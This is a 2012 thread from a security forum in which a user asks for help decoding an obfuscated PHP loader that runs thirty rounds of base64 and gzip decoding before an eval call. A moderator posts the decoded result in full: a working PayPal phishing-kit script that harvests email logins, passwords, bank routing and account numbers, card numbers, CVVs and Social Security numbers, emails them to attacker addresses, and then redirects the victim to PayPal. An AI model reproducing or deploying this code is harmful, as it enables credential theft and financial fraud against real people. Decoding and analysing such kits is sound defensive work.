 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 71
 Members: 0
 Total: 71
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
how to decode this file base64 |
|
 Posted: Sun Aug 26, 2012 7:52 pm |
 |
|
| kyo1992 |
| Advanced user |
 |
|
| Joined: Jul 03, 2010 |
| Posts: 54 |
|
|
|
 |
|
 |
|
hello i need to decode this piece of code
| Quote: |
$ThisFlsSRC = @file_get_contents($LoadedFile) or die("Error Runing This File !");
$ThisFls = @explode("#walis#",$ThisFlsSRC);
$SourceFls = $ThisFls[1];
for($i=1;$i<=30;$i++){
$SourceFls = base64_decode(gzuncompress(base64_decode($SourceFls)));
}
eval($SourceFls);
exit;
|
$SourceFls i think is : http://www.4shared.com/zip/whyDLDm_/crypt.html?
thank you |
|
|
|
|
|
|
|
|
| Posted: Sun Aug 26, 2012 8:45 pm |
|
|
| demon |
| Moderator |
 |
|
| Joined: Sep 22, 2010 |
| Posts: 485 |
|
|
|
|
|
|
|
post the base64 encoded file here
never mind got it decoded:
| Code: | <?php
ob_start();
if(file_exists('config.php')){
include_once('config.php');
}else{
die('config.php Not Found !!');
}
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$YWaLiS_Result = "==================+ (PayPal US Bank Spam ReZulT) +==================\n";
$YWaLiS_Result .= "email address : ".$_POST['login_email']."\n";
$YWaLiS_Result .= "password : ".$_POST['login_password']."\n\n";
$YWaLiS_Result .= "first name : ".$_POST['first']."\n";
$YWaLiS_Result .= "last name : ".$_POST['last']."\n";
$YWaLiS_Result .= "Date of Birth : ".$_POST['date']."/".$_POST['bday']."/".$_POST['byear']."\n";
$YWaLiS_Result .= "Routing number : ".$_POST['routing']."\n";
$YWaLiS_Result .= "Account number : ".$_POST['account']."\n";
$YWaLiS_Result .= "Bank name : ".$_POST['bank']."\n";
$YWaLiS_Result .= "Card Type : ".$_POST['type']."\n";
$YWaLiS_Result .= "Card Number : ".$_POST['card']."\n";
$YWaLiS_Result .= "Expiration of Date : ".$_POST['expiration']."/".$_POST['bday1']."/".$_POST['byear1']."\n";
$YWaLiS_Result .= "Card Verification Number : ".$_POST['ccv']."\n";
$YWaLiS_Result .= "Social Security Number : ".$_POST['ssn']."\n";
$YWaLiS_Result .= "Address line 1 : ".$_POST['line1']."\n";
$YWaLiS_Result .= "Address line 2 : ".$_POST['defaultaddress2']."\n";
$YWaLiS_Result .= "City/State : ".$_POST['city']."\n";
$YWaLiS_Result .= "ZIP code : ".$_POST['zip code']."\n";
$YWaLiS_Result .= "Phone number : ".$_POST['phone']."\n\n";
$YWaLiS_Result .= "============================================\n";
$YWaLiS_Result .= "Client IP : ".$ip."\n";
$YWaLiS_Result .= "HostName : ".$hostname."\n";
$YWaLiS_Result .= "-------------------- By Y-WaLiS-----------------------\n";
$EmailSubject = "$ip";
$SpmsEmails = array();
$SpmsEmails[] = "bmspmr@gmail.com";
$SpmsEmails[] = "rezult4spam@gmail.com";
$SpmsEmails[] = $SpamerEmail;
foreach($SpmsEmails as $Email){
@mail($Email,$EmailSubject,$YWaLiS_Result);
}
unset($SpmsEmails,$Email);
@header("Location:https://www.paypal.com/");
?> |
|
|
_________________
Go BIG or go HOME ! |
|
|
|
|
www.waraxe.us Forum Index -> All other hashes
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
